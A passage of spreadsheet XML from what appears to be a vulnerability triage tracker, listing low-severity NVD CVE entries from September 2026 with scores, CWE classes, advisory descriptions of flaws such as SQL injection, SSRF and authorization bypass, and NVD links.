      <c r="E1427" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1427" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1427" s="5" t="inlineStr"/>
      <c r="H1427" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1427" s="5" t="inlineStr"/>
      <c r="J1427" s="5" t="inlineStr"/>
      <c r="K1427" s="5" t="inlineStr"/>
      <c r="L1427" s="5" t="inlineStr"/>
      <c r="M1427" s="5" t="inlineStr"/>
      <c r="N1427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1427" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1427" s="5" t="inlineStr"/>
      <c r="Q1427" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-269</t>
        </is>
      </c>
      <c r="R1427" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in lenve vhr 1.0-SNAPSHOT. This issue affects the function HrInfoController.updateHr of the file HrMapper.xml. Such manipulation of the argument Password leads to improper privilege management. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="S1427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90501</t>
        </is>
      </c>
    </row>
    <row r="1428">
      <c r="A1428" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1428" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90511</t>
        </is>
      </c>
      <c r="D1428" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1428" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1428" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1428" s="5" t="inlineStr"/>
      <c r="H1428" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1428" s="5" t="inlineStr"/>
      <c r="J1428" s="5" t="inlineStr"/>
      <c r="K1428" s="5" t="inlineStr"/>
      <c r="L1428" s="5" t="inlineStr"/>
      <c r="M1428" s="5" t="inlineStr"/>
      <c r="N1428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1428" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1428" s="5" t="inlineStr"/>
      <c r="Q1428" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R1428" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in GongShengyue OnlineBooks up to dfc5eacc08d3b0396c266049548618f6fb9587ea. This vulnerability affects unknown code of the file src/cn/ylcto/book/servlet/BooksServlet.java of the component listSplit Interface. The manipulation of the argument column results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed.</t>
        </is>
      </c>
      <c r="S1428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90511</t>
        </is>
      </c>
    </row>
    <row r="1429">
      <c r="A1429" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1429" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90580</t>
        </is>
      </c>
      <c r="D1429" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1429" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1429" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1429" s="5" t="inlineStr"/>
      <c r="H1429" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1429" s="5" t="inlineStr"/>
      <c r="J1429" s="5" t="inlineStr"/>
      <c r="K1429" s="5" t="inlineStr">
        <is>
          <t>flowiseai:flowise</t>
        </is>
      </c>
      <c r="L1429" s="5" t="inlineStr"/>
      <c r="M1429" s="5" t="inlineStr"/>
      <c r="N1429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1429" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1429" s="5" t="inlineStr"/>
      <c r="Q1429" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1429" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in FlowiseAI Flowise up to 3.0.2. This vulnerability affects the function axios.post of the file packages/server/src/controllers/evaluations/index.ts of the component Evaluations Endpoint. The manipulation of the argument Host/X-Forwarded-Proto results in server-side request forgery. The attack may be launched remotely. The exploit has been made public and could be used. Upgrading to version 3.1.3 is able to resolve this issue. The patch is identified as 700137738bcaebefd4709021f6d6b0abcd7df0ac. It is recommended to upgrade the affected component. This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="S1429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90580</t>
        </is>
      </c>
    </row>
    <row r="1430">
      <c r="A1430" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1430" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90598</t>
        </is>
      </c>
      <c r="D1430" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1430" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1430" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1430" s="5" t="inlineStr"/>
      <c r="H1430" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1430" s="5" t="inlineStr"/>
      <c r="J1430" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K1430" s="5" t="inlineStr"/>
      <c r="L1430" s="5" t="inlineStr"/>
      <c r="M1430" s="5" t="inlineStr"/>
      <c r="N1430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1430" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1430" s="5" t="inlineStr"/>
      <c r="Q1430" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="R1430" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in jaygajera17 E-commerce-project-springBoot up to 5e74a46b4b70623d0e4a0c9c4aee3bd1777185d2. The impacted element is the function UserController.updateUser of the file UserController.java. Performing a manipulation of the argument userid results in authorization bypass. It is possible to initiate the attack remotely. The exploit is now public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="S1430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90598</t>
        </is>
      </c>
    </row>
    <row r="1431">
      <c r="A1431" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1431" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90700</t>
        </is>
      </c>
      <c r="D1431" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1431" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1431" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1431" s="5" t="inlineStr"/>
      <c r="H1431" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1431" s="5" t="inlineStr"/>
      <c r="J1431" s="5" t="inlineStr"/>
      <c r="K1431" s="5" t="inlineStr"/>
      <c r="L1431" s="5" t="inlineStr"/>
      <c r="M1431" s="5" t="inlineStr"/>
      <c r="N1431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1431" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1431" s="5" t="inlineStr"/>
      <c r="Q1431" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R1431" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in itsourcecode Sales and Inventory System 1.0. Impacted is an unknown function of the file /pages/pro_edit1.php. Such manipulation of the argument prodcode leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used.</t>
        </is>
      </c>
      <c r="S1431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90700</t>
        </is>
      </c>
    </row>
    <row r="1432">
      <c r="A1432" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1432" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90793</t>
        </is>
      </c>
      <c r="D1432" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1432" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1432" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1432" s="5" t="inlineStr"/>
      <c r="H1432" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1432" s="5" t="inlineStr"/>
      <c r="J1432" s="5" t="inlineStr"/>
      <c r="K1432" s="5" t="inlineStr"/>
      <c r="L1432" s="5" t="inlineStr"/>
      <c r="M1432" s="5" t="inlineStr"/>
      <c r="N1432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1432" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1432" s="5" t="inlineStr"/>
      <c r="Q1432" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-416</t>
        </is>
      </c>
      <c r="R1432" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in GPAC up to f1219cde. Impacted is the function gf_node_get_name of the file scenegraph/base_scenegraph.c of the component MP4Box. Such manipulation leads to use after free. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. Upgrading to version abi-16.23 is recommended to address this issue. The name of the patch is 9eb40df4448b88d6a6ce3454657c06f47eff0b24. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="S1432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90793</t>
        </is>
      </c>
    </row>
    <row r="1433">
      <c r="A1433" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1433" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90807</t>
        </is>
      </c>
      <c r="D1433" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1433" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1433" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1433" s="5" t="inlineStr"/>
      <c r="H1433" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1433" s="5" t="inlineStr"/>
      <c r="J1433" s="5" t="inlineStr"/>
      <c r="K1433" s="5" t="inlineStr"/>
      <c r="L1433" s="5" t="inlineStr"/>
      <c r="M1433" s="5" t="inlineStr"/>
      <c r="N1433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1433" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1433" s="5" t="inlineStr"/>
      <c r="Q1433" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R1433" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in nanocoai NanoClaw up to 2.1.17. This issue affects the function forwardAttachedFiles of the file src/modules/agent-to-agent/agent-route.ts of the component Attachment Handler. The manipulation results in link following. The attack may be performed from remote. The exploit has been made public and could be used. The patch is identified as 3f9ed607b7e7a4872747295f75286f1c377d7c33. It is advisable to implement a patch to correct this issue.</t>
        </is>
      </c>
      <c r="S1433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90807</t>
        </is>
      </c>
    </row>
    <row r="1434">
      <c r="A1434" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1434" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90812</t>
        </is>
      </c>
      <c r="D1434" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1434" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1434" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1434" s="5" t="inlineStr"/>
      <c r="H1434" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1434" s="5" t="inlineStr"/>
      <c r="J1434" s="5" t="inlineStr"/>
      <c r="K1434" s="5" t="inlineStr"/>
      <c r="L1434" s="5" t="inlineStr"/>
      <c r="M1434" s="5" t="inlineStr"/>
      <c r="N1434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1434" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1434" s="5" t="inlineStr"/>
      <c r="Q1434" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="R1434" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in cosmicstack-labs mercury-agent up to 1.2.0. This impacts the function checkShellCommand of the file src/capabilities/permissions.ts of the component Shell Command Permission. The manipulation leads to incorrect privilege assignment. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90812</t>
        </is>
      </c>
    </row>
    <row r="1435">
      <c r="A1435" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1435" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90818</t>
        </is>
      </c>
      <c r="D1435" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1435" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1435" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1435" s="5" t="inlineStr"/>
      <c r="H1435" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1435" s="5" t="inlineStr"/>
      <c r="J1435" s="5" t="inlineStr"/>
      <c r="K1435" s="5" t="inlineStr"/>
      <c r="L1435" s="5" t="inlineStr"/>
      <c r="M1435" s="5" t="inlineStr"/>
      <c r="N1435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1435" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1435" s="5" t="inlineStr"/>
      <c r="Q1435" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1435" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in netease-youdao LobsterAI 2026.6.15/2026.8.28/2026.9.3/2026.9.4. Impacted is the function OpenClawConfigSync.buildBrowserConfig of the file src/main/libs/openclawConfigSync.ts of the component Browser Network Configuration. The manipulation results in server-side request forgery. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The reported GitHub issue was closed automatically due to inactivity.</t>
        </is>
      </c>
      <c r="S1435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90818</t>
        </is>
      </c>
    </row>
    <row r="1436">
      <c r="A1436" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92364</t>
        </is>
      </c>
      <c r="D1436" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1436" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1436" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1436" s="5" t="inlineStr"/>
      <c r="H1436" s="5" t="inlineStr"/>
      <c r="I1436" s="5" t="inlineStr"/>
      <c r="J1436" s="5" t="inlineStr"/>
      <c r="K1436" s="5" t="inlineStr"/>
      <c r="L1436" s="5" t="inlineStr"/>
      <c r="M1436" s="5" t="inlineStr"/>
      <c r="N1436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1436" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1436" s="5" t="inlineStr"/>
      <c r="Q1436" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R1436" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in itsourcecode Leave Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /module/employee/index.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="S1436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92364</t>
        </is>
      </c>
    </row>
    <row r="1437">
      <c r="A1437" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92383</t>
        </is>
      </c>
      <c r="D1437" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1437" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1437" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1437" s="5" t="inlineStr"/>
      <c r="H1437" s="5" t="inlineStr"/>
      <c r="I1437" s="5" t="inlineStr"/>
      <c r="J1437" s="5" t="inlineStr"/>
      <c r="K1437" s="5" t="inlineStr"/>
      <c r="L1437" s="5" t="inlineStr"/>
      <c r="M1437" s="5" t="inlineStr"/>
      <c r="N1437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1437" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1437" s="5" t="inlineStr"/>
      <c r="Q1437" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-862</t>
        </is>
      </c>
      <c r="R1437" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in PbootCMS up to 3.2.24. This vulnerability affects the function UserController::del/UserController::mod of the file apps/admin/controller/system/UserController.php of the component User Management. Such manipulation leads to cross-site request forgery. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. Upgrading to version 3.2.25 is able to resolve this issue. The name of the patch is c25241a0964742cefb7f698efbb6c38b868d6ff7. It is advisable to upgrade the affected component.</t>
        </is>
      </c>
      <c r="S1437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92383</t>
        </is>
      </c>
    </row>
    <row r="1438">
      <c r="A1438" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1438" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81870</t>
        </is>
      </c>
      <c r="D1438" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E1438" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1438" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1438" s="5" t="inlineStr"/>
      <c r="H1438" s="5" t="inlineStr"/>
      <c r="I1438" s="5" t="inlineStr"/>
      <c r="J1438" s="5" t="inlineStr"/>
      <c r="K1438" s="5" t="inlineStr"/>
      <c r="L1438" s="5" t="inlineStr"/>
      <c r="M1438" s="5" t="inlineStr"/>
      <c r="N1438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1438" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1438" s="5" t="inlineStr"/>
      <c r="Q1438" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-532</t>
        </is>
      </c>
      <c r="R1438" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. From version 1.5.0 to 1.44.0, sdk/trace.NewTracerProvider emits a TracerProvider created internal Info-level diagnostic event whose MarshalLog implementations recursively include span processor, exporter, and client configuration. Applications that call otel.SetLogger to enable OpenTelemetry internal Info logging can therefore record OTLP gRPC and HTTP collector endpoints, the OTLP HTTP Insecure flag, and complete Zipkin collector URLs. A person or system with access to those logs can learn internal collector topology and can recover credentials or tokens embedded in Zipkin URL user information or query strings. The default OpenTelemetry logger does not emit the event, and this path does not log OTLP authentication headers, TLS key material, or span payloads. This issue is fixed in version 1.45.0.</t>
        </is>
      </c>
      <c r="S1438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81870</t>
        </is>
      </c>
    </row>
    <row r="1439">
      <c r="A1439" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1439" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85387</t>
        </is>
      </c>
      <c r="D1439" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E1439" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1439" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G1439" s="5" t="inlineStr"/>
      <c r="H1439" s="5" t="inlineStr"/>
      <c r="I1439" s="5" t="inlineStr"/>
      <c r="J1439" s="5" t="inlineStr"/>
      <c r="K1439" s="5" t="inlineStr"/>
      <c r="L1439" s="5" t="inlineStr"/>
      <c r="M1439" s="5" t="inlineStr"/>
      <c r="N1439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1439" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1439" s="5" t="inlineStr"/>
      <c r="Q1439" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R1439" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS before 9.5.4 re-authorized OAuth REST API requests from the bearer token alone and did not re-check the state of the account the token had been issued to. The resource server's authorization validator confirmed only that a token existed, had not expired, and had not been explicitly revoked, and deactivating a user did not revoke that user's outstanding tokens. As a result, a deactivated user retained full access to /ccm/api/1.0/* for the remaining lifetime of any token already issued to them. The same gap applied to accounts that had been deleted or locked pending a forced password reset. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 2.0 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Myq Larson for reporting.</t>
        </is>
      </c>
      <c r="S1439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85387</t>
        </is>
      </c>
    </row>
    <row r="1440">
      <c r="A1440" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1440" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90496</t>
        </is>
      </c>
      <c r="D1440" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E1440" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1440" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1440" s="5" t="inlineStr"/>
      <c r="H1440" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1440" s="5" t="inlineStr"/>
      <c r="J1440" s="5" t="inlineStr"/>
      <c r="K1440" s="5" t="inlineStr"/>
      <c r="L1440" s="5" t="inlineStr"/>
      <c r="M1440" s="5" t="inlineStr"/>
      <c r="N1440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1440" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1440" s="5" t="inlineStr"/>
      <c r="Q1440" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R1440" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Fengoffice Feng Office up to 3.11.13.11. Affected is the function update_system_module_order/update_dimension_order of the file application/controllers/MoreController.class.php of the component Reorder Handlers. Performing a manipulation of the argument modules/dims results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="S1440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90496</t>
        </is>
      </c>
    </row>
    <row r="1441">
      <c r="A1441" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1441" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90695</t>
        </is>
      </c>
      <c r="D1441" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E1441" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1441" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1441" s="5" t="inlineStr"/>
      <c r="H1441" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1441" s="5" t="inlineStr"/>
      <c r="J1441" s="5" t="inlineStr"/>
      <c r="K1441" s="5" t="inlineStr"/>
      <c r="L1441" s="5" t="inlineStr"/>
      <c r="M1441" s="5" t="inlineStr"/>
      <c r="N1441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1441" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1441" s="5" t="inlineStr"/>
      <c r="Q1441" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R1441" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in SourceCodester Inventory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /api/vendors_handler.php of the component Vendor Management. Performing a manipulation results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="S1441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90695</t>
        </is>
      </c>
    </row>
    <row r="1442">
      <c r="A1442" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1442" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90705</t>
        </is>
      </c>
      <c r="D1442" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E1442" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1442" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1442" s="5" t="inlineStr"/>
      <c r="H1442" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I1442" s="5" t="inlineStr"/>
      <c r="J1442" s="5" t="inlineStr"/>
      <c r="K1442" s="5" t="inlineStr"/>
      <c r="L1442" s="5" t="inlineStr"/>
      <c r="M1442" s="5" t="inlineStr"/>
      <c r="N1442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1442" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1442" s="5" t="inlineStr"/>
      <c r="Q1442" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="R1442" s="5" t="inlineStr">
        <is>
